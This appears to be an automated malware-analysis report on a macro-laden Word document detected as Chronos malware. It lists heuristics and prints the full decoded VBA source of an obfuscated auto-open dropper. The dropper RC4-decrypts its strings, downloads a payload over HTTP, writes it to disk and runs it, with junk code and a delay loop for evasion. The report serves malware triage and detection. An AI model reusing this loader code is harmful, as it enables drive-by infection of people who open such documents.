MALICIOUS
Risk Score: 360
Heuristics (11)
-
ClamAV: Doc.Malware.Chronos-6897935-0 [critical, CLAMAV_DETECTION] ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
-
VBA project inside OOXML [medium, 6 related findings, OOXML_VBA] Document contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader [critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER] Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script:
Set YryQdthx = CreateObject(PT1MPEetzdZ7c1(Chr(8) + Chr(196) + Chr(215) + Chr(3) + Chr(89) + Chr(208) + Chr(68) + Chr(90) + Chr(162) + Chr(59) + Chr(81) + Chr(134) + Chr(181) + Chr(160) + Chr(77) + Chr(185) + Chr(41) + Chr(230) + Chr(61) + Chr(106), "McpOWLCwAjF")) -
CreateObject call [high, OLE_VBA_CREATEOBJ] CreateObject call. Matched line in script:
Set YryQdthx = CreateObject(PT1MPEetzdZ7c1(Chr(8) + Chr(196) + Chr(215) + Chr(3) + Chr(89) + Chr(208) + Chr(68) + Chr(90) + Chr(162) + Chr(59) + Chr(81) + Chr(134) + Chr(181) + Chr(160) + Chr(77) + Chr(185) + Chr(41) + Chr(230) + Chr(61) + Chr(106), "McpOWLCwAjF")) -
CallByName call [high, OLE_VBA_CALLBYNAME] CallByName call. Matched line in script:
CallByName Svo2b4mDM0WV, 61, VbMethod, 5, 73, 93 -
VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC] Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro [low, OLE_VBA_DOCOPEN] Document_Open macro. Matched line in script:
Sub Document_Open() -
Environ() call (env variable access) [low, OLE_VBA_ENVIRON] Environ() call (env variable access). Matched line in script:
DrpSr = Environ(PT1MPEetzdZ7c1(Chr(170) + Chr(15) + Chr(31) + Chr(184) + Chr(70) + Chr(172) + Chr(13), "Fgqe7pmN9")) & "\" & JcDyxQB5qJX0 & PT1MPEetzdZ7c1(Chr(136) + Chr(149) + Chr(0) + Chr(5), "IMdqWyjHXnxpZ") -
Macro/content-enable lure [medium, SE_ENABLE_LURE] Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE] One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL [info, EMBEDDED_URL] One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12751 bytes |

SHA-256: 14e2fed1fdee36dd5296b26dab969a80b93c7197a0b017e6002afd76ac2e03ed

Detection
ClamAV: No threats found
Obfuscation or payload: likely. 104 of 176 identifiers look randomly generated (e.g. 'Ud6e42tkuSy4bP0bNs5ndOg7') — consistent with name-mangling obfuscation.
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Sub M8ohQVtby3()
Dim TP8wTff7r38 As Long, A9OxmVfQnN7 As Long
TP8wTff7r38 = 83
A9OxmVfQnN7 = 90
If TP8wTff7r38 + A9OxmVfQnN7 > 2 Then
A9OxmVfQnN7 = TP8wTff7r38 + 95
Else
MsgBox 80
End If
Dim DrpSr As String, YryQdthx As Object, Yh69e As Integer
Dim YBnXWTbAm As Long, I6aRk8CiiJH As Long
YBnXWTbAm = 44
I6aRk8CiiJH = 81
If YBnXWTbAm + I6aRk8CiiJH > 2 Then
I6aRk8CiiJH = YBnXWTbAm + 96
Else
MsgBox 76
End If
DrpSr = Environ(PT1MPEetzdZ7c1(Chr(170) + Chr(15) + Chr(31) + Chr(184) + Chr(70) + Chr(172) + Chr(13), "Fgqe7pmN9")) & "\" & JcDyxQB5qJX0 & PT1MPEetzdZ7c1(Chr(136) + Chr(149) + Chr(0) + Chr(5), "IMdqWyjHXnxpZ")
Dim XtDO0qv17JHzP As Long, HzCCOSV As Long
XtDO0qv17JHzP = 69
HzCCOSV = 8
If XtDO0qv17JHzP + HzCCOSV > 2 Then
HzCCOSV = XtDO0qv17JHzP + 18
Else
MsgBox 34
End If
Set YryQdthx = CreateObject(PT1MPEetzdZ7c1(Chr(8) + Chr(196) + Chr(215) + Chr(3) + Chr(89) + Chr(208) + Chr(68) + Chr(90) + Chr(162) + Chr(59) + Chr(81) + Chr(134) + Chr(181) + Chr(160) + Chr(77) + Chr(185) + Chr(41) + Chr(230) + Chr(61) + Chr(106), "McpOWLCwAjF"))
Dim EazVllelnZ As Long, GBdvm09cFJn1Hr As Long
EazVllelnZ = 95
GBdvm09cFJn1Hr = 80
If EazVllelnZ + GBdvm09cFJn1Hr > 2 Then
GBdvm09cFJn1Hr = EazVllelnZ + 28
Else
MsgBox 57
End If
YryQdthx.Open PT1MPEetzdZ7c1(Chr(84) + Chr(107) + Chr(83), "Pmp53rd"), PT1MPEetzdZ7c1(Chr(193) + Chr(242) + Chr(103) + Chr(222) + Chr(7) + Chr(10) + Chr(203) + Chr(255) + Chr(28) + Chr(114) + Chr(121) + Chr(5) + Chr(93) + Chr(216) + Chr(218) + Chr(251) + Chr(111) + Chr(247) + Chr(145) + Chr(87) + Chr(135) + Chr(78) + Chr(197) + Chr(83) + Chr(67) + Chr(163) + Chr(98), "AJHvpx"), False
Dim JGIcO3YBJocRd As Long, V6J0qqj8f4hSQEGnY As Long
JGIcO3YBJocRd = 53
V6J0qqj8f4hSQEGnY = 58
If JGIcO3YBJocRd + V6J0qqj8f4hSQEGnY > 2 Then
V6J0qqj8f4hSQEGnY = JGIcO3YBJocRd + 42
Else
MsgBox 90
End If
YryQdthx.setRequestHeader PT1MPEetzdZ7c1(Chr(143) + Chr(117) + Chr(140) + Chr(252) + Chr(215) + Chr(13) + Chr(186) + Chr(49) + Chr(96) + Chr(12), "VPu6PxOZV5"), PT1MPEetzdZ7c1(Chr(11) + Chr(102) + Chr(242) + Chr(106) + Chr(87) + Chr(163) + Chr(58) + Chr(34) + Chr(234) + Chr(101) + Chr(155), "CdN8qyV")
YryQdthx.send
If YryQdthx.Status = 200 Then
Dim Y3vCNdiP7Vz6 As Long, TyqnBQroC74hmFh As Long
Y3vCNdiP7Vz6 = 63
TyqnBQroC74hmFh = 26
If Y3vCNdiP7Vz6 + TyqnBQroC74hmFh > 2 Then
TyqnBQroC74hmFh = Y3vCNdiP7Vz6 + 38
Else
MsgBox 75
End If
Yh69e = FreeFile
Open DrpSr For Binary Access Write Lock Write As #Yh69e
Put #Yh69e, , PT1MPEetzdZ7c1(StrConv(YryQdthx.ResponseBody, vbUnicode), PT1MPEetzdZ7c1(Chr(9) + Chr(169) + Chr(104) + Chr(18) + Chr(164) + Chr(18) + Chr(97) + Chr(128) + Chr(100), "UljByQ05"))
Close #Yh69e
Dim RLzoc As Long, HE0B81bq6UzaU8pph As Long
RLzoc = 84
HE0B81bq6UzaU8pph = 89
If RLzoc + HE0B81bq6UzaU8pph > 2 Then
HE0B81bq6UzaU8pph = RLzoc + 73
Else
MsgBox 22
End If
PGIu5vM1Qn 1
Dim CQUJn1Hr As Long, PNE5jpR3JyejFMH As Long
CQUJn1Hr = 98
PNE5jpR3JyejFMH = 22
If CQUJn1Hr + PNE5jpR3JyejFMH > 2 Then
PNE5jpR3JyejFMH = CQUJn1Hr + 98
Else
MsgBox 93
End If
CreateObject(PT1MPEetzdZ7c1(Chr(158) + Chr(254) + Chr(142) + Chr(209) + Chr(80) + Chr(79) + Chr(235) + Chr(54) + Chr(10) + Chr(196) + Chr(206) + Chr(60) + Chr(137), "C5pjnjDpia")).Run """" & DrpSr & """"
Dim VBGJQgsL4Qp As Long, XB9ySBq6aW As Long
VBGJQgsL4Qp = 10
XB9ySBq6aW = 9
If VBGJQgsL4Qp + XB9ySBq6aW > 2 Then
XB9ySBq6aW = VBGJQgsL4Qp + 39
Else
MsgBox 46
End If
End If
Dim MkJcNYIE6pN As Long, MoSP5mqqf As Long
MkJcNYIE6pN = 87
MoSP5mqqf = 37
If MkJcNYIE6pN + MoSP5mqqf > 2 Then
MoSP5mqqf = MkJcNYIE6pN + 53
Else
MsgBox 32
End If
Set YryQdthx = Nothing
Dim Hq5xUCu2 As Long, YJPPvWf6 As Long
Hq5xUCu2 = 73
YJPPvWf6 = 95
If Hq5xUCu2 + YJPPvWf6 > 2 Then
YJPPvWf6 = Hq5xUCu2 + 3
Else
MsgBox 31
End If
End Sub
Sub Document_Open()
Dim Ogk As Long, X5vIt7r8h3 As Long
Ogk = 26
X5vIt7r8h3 = 60
If Ogk + X5vIt7r8h3 > 2 Then
X5vIt7r8h3 = Ogk + 10
Else
MsgBox 60
End If
Dim IpYsso As Long, KAC7zQ7WcNtG As Long, KMvRU3vVJUdmz As Long
Dim Tf6qrpetCe As Long, ICguDWLjZacFKiMw As Long
Tf6qrpetCe = 30
ICguDWLjZacFKiMw = 47
If Tf6qrpetCe + ICguDWLjZacFKiMw > 2 Then
ICguDWLjZacFKiMw = Tf6qrpetCe + 48
Else
MsgBox 45
End If
IpYsso = 972996613: KAC7zQ7WcNtG = 0: KMvRU3vVJUdmz = 0
Dim Uhx1DdrNEYX5OzJ1 As Long, IOODh84ChY6T As Long
Uhx1DdrNEYX5OzJ1 = 59
IOODh84ChY6T = 13
If Uhx1DdrNEYX5OzJ1 + IOODh84ChY6T > 2 Then
IOODh84ChY6T = Uhx1DdrNEYX5OzJ1 + 51
Else
MsgBox 11
End If
For KAC7zQ7WcNtG = 1 To IpYsso
KMvRU3vVJUdmz = KMvRU3vVJUdmz + 1
Next KAC7zQ7WcNtG
Dim TTi9cJZlPqzyBgiCT As Long, TlyzDtmVZ As Long
TTi9cJZlPqzyBgiCT = 3
TlyzDtmVZ = 55
If TTi9cJZlPqzyBgiCT + TlyzDtmVZ > 2 Then
TlyzDtmVZ = TTi9cJZlPqzyBgiCT + 98
Else
MsgBox 95
End If
If KMvRU3vVJUdmz = IpYsso Then
Dim TMFAJ6K As Long, G9JerWSr As Long
TMFAJ6K = 57
G9JerWSr = 91
If TMFAJ6K + G9JerWSr > 2 Then
G9JerWSr = TMFAJ6K + 15
Else
MsgBox 92
End If
M8ohQVtby3
Dim YJkX55kfp67iUD As Long, C54X1JD As Long
YJkX55kfp67iUD = 17
C54X1JD = 85
If YJkX55kfp67iUD + C54X1JD > 2 Then
C54X1JD = YJkX55kfp67iUD + 7
Else
MsgBox 18
End If
Else
Dim OJcNYIE6pNa7XBk As Long, W9FBazQrhT As Long
OJcNYIE6pNa7XBk = 53
W9FBazQrhT = 32
If OJcNYIE6pNa7XBk + W9FBazQrhT > 2 Then
W9FBazQrhT = OJcNYIE6pNa7XBk + 93
Else
MsgBox 84
End If
GoU1kg2
Dim LwY2RpAJPd As Long, Ud6e42tkuSy4bP0bNs5ndOg7 As Long
LwY2RpAJPd = 18
Ud6e42tkuSy4bP0bNs5ndOg7 = 13
If LwY2RpAJPd + Ud6e42tkuSy4bP0bNs5ndOg7 > 2 Then
Ud6e42tkuSy4bP0bNs5ndOg7 = LwY2RpAJPd + 1
Else
MsgBox 36
End If
End If
Dim MDAAGyHZ2mblF As Long, I4o781Nb3UCh As Long
MDAAGyHZ2mblF = 73
I4o781Nb3UCh = 20
If MDAAGyHZ2mblF + I4o781Nb3UCh > 2 Then
I4o781Nb3UCh = MDAAGyHZ2mblF + 54
Else
MsgBox 4
End If
End Sub
Function JcDyxQB5qJX0() As String
Dim Fkwh8YJSQHSN As Long, YvoMiC00Dk As Long
Fkwh8YJSQHSN = 67
YvoMiC00Dk = 62
If Fkwh8YJSQHSN + YvoMiC00Dk > 2 Then
YvoMiC00Dk = Fkwh8YJSQHSN + 6
Else
MsgBox 48
End If
Dim MIgKeqzq5j() As Byte, W7wqxUbclDnDkE() As Byte, IwxEP6V As Long, CSz3McKsdql As Long, PQAXJFrAXb00KfBhs As String, R72Ykj As String, RIuSUW7qrdQfIk As Long
Dim CnKMWENE As Long, W3OWLB1scSUU9R8xj As Long
CnKMWENE = 8
W3OWLB1scSUU9R8xj = 89
If CnKMWENE + W3OWLB1scSUU9R8xj > 2 Then
W3OWLB1scSUU9R8xj = CnKMWENE + 71
Else
MsgBox 98
End If
RIuSUW7qrdQfIk = 0
Dim L2QvuJgl9Y As Long, O6Yo4QT8NK7mwQp As Long
L2QvuJgl9Y = 66
O6Yo4QT8NK7mwQp = 92
If L2QvuJgl9Y + O6Yo4QT8NK7mwQp > 2 Then
O6Yo4QT8NK7mwQp = L2QvuJgl9Y + 86
Else
MsgBox 53
End If
GixUfR4WYaURE:
Dim WLyV4bE48EHa0lb As Long, DuiL3092JiFDX As Long
WLyV4bE48EHa0lb = 37
DuiL3092JiFDX = 55
If WLyV4bE48EHa0lb + DuiL3092JiFDX > 2 Then
DuiL3092JiFDX = WLyV4bE48EHa0lb + 1
Else
MsgBox 64
End If
Randomize
R72Ykj = Int(30 * Rnd)
If R72Ykj < 4 Then GoTo GixUfR4WYaURE
RIuSUW7qrdQfIk = R72Ykj
If RIuSUW7qrdQfIk > 0& Then
Dim Parey3 As Long, ECcRwzs5mYGY9mmYf As Long
Parey3 = 50
ECcRwzs5mYGY9mmYf = 17
If Parey3 + ECcRwzs5mYGY9mmYf > 2 Then
ECcRwzs5mYGY9mmYf = Parey3 + 16
Else
MsgBox 91
End If
PQAXJFrAXb00KfBhs = PT1MPEetzdZ7c1(Chr(97) + Chr(211) + Chr(236) + Chr(191) + Chr(44) + Chr(22) + Chr(209) + Chr(8) + Chr(84) + Chr(196), "Fe42tkuS57cU")
Randomize
MIgKeqzq5j = PQAXJFrAXb00KfBhs
IwxEP6V = Len(PQAXJFrAXb00KfBhs) - 1&
RIuSUW7qrdQfIk = (RIuSUW7qrdQfIk * 2&) - 1&
ReDim W7wqxUbclDnDkE(RIuSUW7qrdQfIk) As Byte
Dim LR7spMk6D0wu52NsM As Long, K6VLntzVfU As Long
LR7spMk6D0wu52NsM = 72
K6VLntzVfU = 97
If LR7spMk6D0wu52NsM + K6VLntzVfU > 2 Then
K6VLntzVfU = LR7spMk6D0wu52NsM + 95
Else
MsgBox 27
End If
For CSz3McKsdql = 0& To RIuSUW7qrdQfIk Step 2&
W7wqxUbclDnDkE(CSz3McKsdql) = MIgKeqzq5j(CLng(IwxEP6V * Rnd) * 2&)
Next
Dim FAHBwCM02hOV1 As Long, FSsARDR2d9Sy As Long
FAHBwCM02hOV1 = 10
FSsARDR2d9Sy = 13
If FAHBwCM02hOV1 + FSsARDR2d9Sy > 2 Then
FSsARDR2d9Sy = FAHBwCM02hOV1 + 75
Else
MsgBox 87
End If
End If
Dim DKi4AJl3gpl As Long, E5QXhvytzcgcd As Long
DKi4AJl3gpl = 77
E5QXhvytzcgcd = 56
If DKi4AJl3gpl + E5QXhvytzcgcd > 2 Then
E5QXhvytzcgcd = DKi4AJl3gpl + 18
Else
MsgBox 35
End If
JcDyxQB5qJX0 = W7wqxUbclDnDkE
Dim BjhItY8w As Long, Uzlq5s6ZpoEqWK4N As Long
BjhItY8w = 2
Uzlq5s6ZpoEqWK4N = 82
If BjhItY8w + Uzlq5s6ZpoEqWK4N > 2 Then
Uzlq5s6ZpoEqWK4N = BjhItY8w + 65
Else
MsgBox 91
End If
End Function
Sub GoU1kg2()
Dim SDsZ9Qs89ZGH0iL As Long, JynrHdQTEk As Long
SDsZ9Qs89ZGH0iL = 45
JynrHdQTEk = 4
If SDsZ9Qs89ZGH0iL + JynrHdQTEk > 2 Then
JynrHdQTEk = SDsZ9Qs89ZGH0iL + 29
Else
MsgBox 27
End If
Round 18, 87
Hour 52
PonEXfGyzdq = Dir("JcC3aqyYvgXz")
TimeSerial 57, 96, 51
Log 60
LoadPicture 86, 80, 47, 73, 22
M2GFyg3qRjh = Cos(10)
FreeFile 22
Weekday 74
Second 90
DateAdd "MCz", 15, 69
Command
Partition 7, 67, 13, 48
Rate 97, 48, 69
HCukMspMk6D = EOF(58)
Reset
WeekdayName 93
CallByName Svo2b4mDM0WV, 61, VbMethod, 5, 73, 93
Stop
If IsNumeric(6) = True Then YNUoCgUoI = 97
ChDrive 20
Err.Raise 53
App.LogEvent "L4A6ndpxNQ"
VAEjgCRgjTpOQ = CVDate(81)
Xd4UDxCX2 = CVar(96)
IPmt 98, 17, 62, 52
Join RLyDNjlJxj5jB, 10
Load MoXneNnOx7rTJC
GetAllSettings 13, 75
DateDiff "SdYB6AyIYZNKY3k1K", 87, 25
Dim UwogOGlQixgWrTFr As Long, QG1CXIRjWycr7B As Long
UwogOGlQixgWrTFr = 55
QG1CXIRjWycr7B = 55
If UwogOGlQixgWrTFr + QG1CXIRjWycr7B > 2 Then
QG1CXIRjWycr7B = UwogOGlQixgWrTFr + 31
Else
MsgBox 4
End If
End Sub
Function PT1MPEetzdZ7c1(ByVal VXFQ3 As String, ByVal KQGW3hk7 As String) As String
Dim YkKUkKQ7ycJm As Long, BivKUR As Long
YkKUkKQ7ycJm = 33
BivKUR = 97
If YkKUkKQ7ycJm + BivKUR > 2 Then
BivKUR = YkKUkKQ7ycJm + 3
Else
MsgBox 42
End If
On Error Resume Next
Dim CWDc4 As Long, WkYOjY As Long
CWDc4 = 28
WkYOjY = 86
If CWDc4 + WkYOjY > 2 Then
WkYOjY = CWDc4 + 38
Else
MsgBox 10
End If
Dim E4RR4VFJ4IqXc(0 To 255) As Integer, QobAHUTR8 As Long, QikW2g48gS5md7k45 As Long, HtLY9DJwS859 As Long, XLn97YyNPhW9R() As Byte, PgyWGgCo9XM() As Byte, JU14iMogQsw As Byte
Dim HtYPC0EY As Long, NTcNU6KOStI As Long
HtYPC0EY = 16
NTcNU6KOStI = 21
If HtYPC0EY + NTcNU6KOStI > 2 Then
NTcNU6KOStI = HtYPC0EY + 6
Else
MsgBox 53
End If
XLn97YyNPhW9R() = StrConv(KQGW3hk7, vbFromUnicode)
Dim JTEn4iDNbk0 As Long, Ue4F5Qc As Long
JTEn4iDNbk0 = 91
Ue4F5Qc = 46
If JTEn4iDNbk0 + Ue4F5Qc > 2 Then
Ue4F5Qc = JTEn4iDNbk0 + 83
Else
MsgBox 44
End If
For QobAHUTR8 = 0 To 255
E4RR4VFJ4IqXc(QobAHUTR8) = QobAHUTR8
Next QobAHUTR8
QobAHUTR8 = 0
QikW2g48gS5md7k45 = 0
HtLY9DJwS859 = 0
For QobAHUTR8 = 0 To 255
QikW2g48gS5md7k45 = (QikW2g48gS5md7k45 + E4RR4VFJ4IqXc(QobAHUTR8) + XLn97YyNPhW9R(QobAHUTR8 Mod Len(KQGW3hk7))) Mod 256
JU14iMogQsw = E4RR4VFJ4IqXc(QobAHUTR8)
E4RR4VFJ4IqXc(QobAHUTR8) = E4RR4VFJ4IqXc(QikW2g48gS5md7k45)
E4RR4VFJ4IqXc(QikW2g48gS5md7k45) = JU14iMogQsw
Next QobAHUTR8
QobAHUTR8 = 0
QikW2g48gS5md7k45 = 0
HtLY9DJwS859 = 0
PgyWGgCo9XM() = StrConv(VXFQ3, vbFromUnicode)
For QobAHUTR8 = 0 To Len(VXFQ3)
QikW2g48gS5md7k45 = (QikW2g48gS5md7k45 + 1) Mod 256
HtLY9DJwS859 = (HtLY9DJwS859 + E4RR4VFJ4IqXc(QikW2g48gS5md7k45)) Mod 256
JU14iMogQsw = E4RR4VFJ4IqXc(QikW2g48gS5md7k45)
E4RR4VFJ4IqXc(QikW2g48gS5md7k45) = E4RR4VFJ4IqXc(HtLY9DJwS859)
E4RR4VFJ4IqXc(HtLY9DJwS859) = JU14iMogQsw
PgyWGgCo9XM(QobAHUTR8) = PgyWGgCo9XM(QobAHUTR8) Xor (E4RR4VFJ4IqXc((E4RR4VFJ4IqXc(QikW2g48gS5md7k45) + E4RR4VFJ4IqXc(HtLY9DJwS859)) Mod 256))
Next QobAHUTR8
Dim Ak1fCnNiw As Long, XsQ7zWU378CX9t As Long
Ak1fCnNiw = 56
XsQ7zWU378CX9t = 30
If Ak1fCnNiw + XsQ7zWU378CX9t > 2 Then
XsQ7zWU378CX9t = Ak1fCnNiw + 81
Else
MsgBox 25
End If
PT1MPEetzdZ7c1 = StrConv(PgyWGgCo9XM, vbUnicode)
Dim W8NXkwuK As Long, Mbi0jxP As Long
W8NXkwuK = 3
Mbi0jxP = 62
If W8NXkwuK + Mbi0jxP > 2 Then
Mbi0jxP = W8NXkwuK + 58
Else
MsgBox 23
End If
End Function
Sub PGIu5vM1Qn(YnjKoH8aZapeBU0 As Long)
Dim QY7cWkfrGHsX As Long, Dz1eCP As Long
QY7cWkfrGHsX = 72
Dz1eCP = 81
If QY7cWkfrGHsX + Dz1eCP > 2 Then
Dz1eCP = QY7cWkfrGHsX + 52
Else
MsgBox 39
End If
Dim G5DJEpCyddr As Long
Dim WKOACQPPmy0Plu As Long, MrBrIHOPHF2g6NzYPV As Long
WKOACQPPmy0Plu = 73
MrBrIHOPHF2g6NzYPV = 25
If WKOACQPPmy0Plu + MrBrIHOPHF2g6NzYPV > 2 Then
MrBrIHOPHF2g6NzYPV = WKOACQPPmy0Plu + 96
Else
MsgBox 28
End If
G5DJEpCyddr = Timer + YnjKoH8aZapeBU0
Do While Timer < G5DJEpCyddr
DoEvents
Loop
Dim XEkdhB4 As Long, GfZWc47F As Long
XEkdhB4 = 7
GfZWc47F = 51
If XEkdhB4 + GfZWc47F > 2 Then
GfZWc47F = XEkdhB4 + 64
Else
MsgBox 78
End If
End Sub

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 32768 bytes |

SHA-256: 613d68688940d50bcc50e2e71e8da478c08097d2794f72a8e6f833bbbac00abe

Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: likely. 193 of 351 identifiers look randomly generated (e.g. 'Ud6e42tkuSy4bP0bNs5ndOg7') — consistent with name-mangling obfuscation.